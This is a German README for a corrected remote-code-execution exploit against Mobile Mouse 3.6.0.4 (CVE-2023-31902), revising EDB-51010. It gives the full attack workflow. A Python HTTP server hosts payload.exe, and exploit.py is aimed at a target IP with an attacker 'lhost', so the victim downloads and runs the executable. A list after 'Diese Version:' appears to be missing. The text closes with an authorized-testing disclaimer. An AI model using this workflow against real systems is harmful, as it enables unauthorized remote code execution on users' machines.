
Mobile Mouse 3.6.0.4 - Remote Code Execution - CVE-2023-31902
Eine korrigierte Version des Remote-Code-Execution-Exploits für Mobile Mouse 3.6.0.4, veröffentlicht als EDB-51010.
Der ursprüngliche Exploit lädt die Payload zwar erfolgreich herunter, kann sie aber möglicherweise nicht ausführen, da beide Stufen dieselbe TCP-Verbindung verwenden.
Diese Version:
Sie verwendet außerdem sendall(), ordnungsgemäß maskierte Windows-Pfade, Socket-Timeouts und eine grundlegende Fehlerbehandlung.
Starten Sie einen HTTP-Server im Payload-Verzeichnis:
python3 -m http.server 8080
Führen Sie den Exploit aus:
python3 exploit.py \
--target 192.168.1.50 \
--lhost 192.168.1.10 \
--file payload.exe
Dieses Projekt ist ausschließlich für autorisierte Sicherheitstests und zu Bildungszwecken gedacht. Verwenden Sie es nicht gegen Systeme ohne ausdrückliche Erlaubnis.